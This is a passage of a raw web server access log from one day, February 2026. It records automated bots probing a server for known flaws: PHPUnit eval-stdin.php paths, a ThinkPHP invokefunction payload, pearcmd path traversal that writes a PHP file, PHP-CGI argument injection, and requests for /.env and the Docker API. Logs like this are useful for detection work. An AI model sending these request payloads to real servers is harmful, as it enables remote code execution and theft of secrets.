"/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:32 +0000] 404 - GET http 222.117.41.51 "/phpunit/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:32 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:33 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:33 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:33 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:34 +0000] 404 - GET http 222.117.41.51 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:34 +0000] 404 - GET http 222.117.41.51 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:34 +0000] 404 - GET http 222.117.41.51 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:34 +0000] 404 - GET http 222.117.41.51 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:35 +0000] 404 - GET http 222.117.41.51 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:35 +0000] 404 - GET http 222.117.41.51 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:35 +0000] 404 - GET http 222.117.41.51 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:36 +0000] 404 - GET http 222.117.41.51 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:36 +0000] 404 - GET http 222.117.41.51 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:36 +0000] 404 - GET http 222.117.41.51 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:37 +0000] 404 - GET http 222.117.41.51 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:37 +0000] 404 - GET http 222.117.41.51 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:37 +0000] 404 - GET http 222.117.41.51 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:37 +0000] 404 - GET http 222.117.41.51 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:38 +0000] 404 - GET http 222.117.41.51 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:38 +0000] 404 - GET http 222.117.41.51 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:39 +0000] 404 - GET http 222.117.41.51 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:39 +0000] 404 - GET http 222.117.41.51 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:39 +0000] 404 - GET http 222.117.41.51 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:40 +0000] 404 - GET http 222.117.41.51 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:40 +0000] 404 - GET http 222.117.41.51 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:40 +0000] 404 - GET http 222.117.41.51 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:40 +0000] 404 - GET http 222.117.41.51 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:41 +0000] 404 - GET http 222.117.41.51 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:41 +0000] 404 - GET http 222.117.41.51 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:42 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:42 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../tmp/index1" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:44:42 +0000] 404 - GET http 222.117.41.51 "/containers/json" [Client 141.11.184.156] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:08:46:31 +0000] 400 - GET http 222.117.41.51 "/" [Client 85.11.182.25] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36" "-" +[18/Feb/2026:08:51:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:08:59:48 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:09:04:11 +0000] 400 - GET http 222.117.41.51 "/aaa9" [Client 45.91.64.7] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[18/Feb/2026:09:04:12 +0000] 400 - GET http 222.117.41.51 "/aab9" [Client 45.91.64.7] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[18/Feb/2026:09:11:31 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 206.189.11.198] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:09:11:31 +0000] 200 - GET http 222.117.41.51 "/" [Client 206.189.11.198] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" "-" +[18/Feb/2026:09:14:39 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:09:28:18 +0000] 200 - GET http 222.117.41.51 "/" [Client 111.192.100.104] [Length 1033] [Gzip -] "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)" "-" +[18/Feb/2026:09:39:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" +[18/Feb/2026:09:42:14 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:09:56:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:09:57:02 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 77.83.39.82] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) QupZilla/1.9.0 Safari/538.1" "-" +[18/Feb/2026:10:08:21 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:10:11:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:10:22:16 +0000] 200 - GET http 222.117.41.51 "/" [Client 51.254.59.113] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" +[18/Feb/2026:10:32:13 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:10:34:11 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" +[18/Feb/2026:10:34:12 +0000] 400 - GET http 222.117.41.51 "/.env" [Client 34.158.168.101] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0" "-" +[18/Feb/2026:10:34:12 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:10:34:13 +0000] 400 - GET http 222.117.41.51 "/" [Client 34.158.168.101] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Firefox/121.0" "-" +[18/Feb/2026:10:34:13 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.158.168.101] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:10:51:38 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:10:57:12 +0000] 404 - GET http 222.117.41.51 "/manager/html" [Client 20.65.195.124] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[18/Feb/2026:10:59:03 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:11:07:46 +0000] 200 - GET http 222.117.41.51 "/" [Client 171.37.46.226] [Length 1033] [Gzip -] "-" "-" +[18/Feb/2026:11:07:48 +0000] 200 - GET http 222.117.41.51 "/" [Client 223.166.22.114] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[18/Feb/2026:11:07:49 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Feb/2026:11:21:04 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:11:27:06 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 118.193.37.92] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:11:27:06 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 118.193.37.92] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:11:27:06 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:06 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 118.193.37.92] [Length 154] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:06 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:06 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:06 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:06 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:06 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:06 +0000] 404 - GET http 222.117.41.51 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/phpunit/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:07 +0000] 404 - GET http 222.117.41.51 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:08 +0000] 404 - GET http 222.117.41.51 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:09 +0000] 404 - GET http 222.117.41.51 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:09 +0000] 404 - GET http 222.117.41.51 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:09 +0000] 404 - GET http 222.117.41.51 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:09 +0000] 404 - GET http 222.117.41.51 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:09 +0000] 404 - GET http 222.117.41.51 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:09 +0000] 404 - GET http 222.117.41.51 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:09 +0000] 404 - GET http 222.117.41.51 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:09 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:09 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../tmp/index1" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:27:09 +0000] 404 - GET http 222.117.41.51 "/containers/json" [Client 118.193.37.92] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Feb/2026:11:46:35 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:11:50:13 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:11:54:49 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.166.237.57] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[18/Feb/2026:12:01:45 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:12:05:54 +0000] 400 - - http localhost "-" [Client 18.218.118.203] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:12:10:39 +0000] 400 - - http localhost "-" [Client 18.218.118.203] [Length 0] [Gzip -] "-" "-" +[18/Feb/2026:12:14:14 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:12:37:51 +0000] 200 - GET http 222.117.41.51 "/" [Client 52.165.88.92] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[18/Feb/2026:12:38:47 +0000] 200 - GET http 222.117.41.51 "/" [Client 20.163.1.211] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[18/Feb/2026:12:39:52 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Linux; Android 8.0.0; Moto Z2 Play) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" +[18/Feb/2026:12:40:25 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:12:45:54 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:12:46:44 +0000] 404 - GET http 222.117.41.51 "/cgi-bin/luci/;stok=/locale" [Client 5.61.209.92] [Length 150] [Gzip -] "-" "-" +[18/Feb/2026:12:46:48 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" +[18/Feb/2026:13:03:41 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Feb/2026:13:05:55 +0000] 404 - GET http 222.117.41.51 "/.env" [Client 77.83.39.82] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" "-" +[18/Feb/2026:13:15:02 +0000] 200 - GET http 222.117.41.51 "/" [Client 162.142.125.35] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[18/Feb/2026:13:15:05 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.35] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:13:15:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.35] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:13:15:09 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Feb/2026:13:15:27 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.35] [Length 154] [Gzip -] "-" "-" +[18/Feb/2026:13:15:31 +0000] 404 - GET http 222.117.41.51 "/.well-known/security.txt" [Client 162.142.125.35] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[18/Feb/2026:13:23:08 +0000] 200 - GET http 222.117.41.51 "/" [Client 119.28.177.175] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone 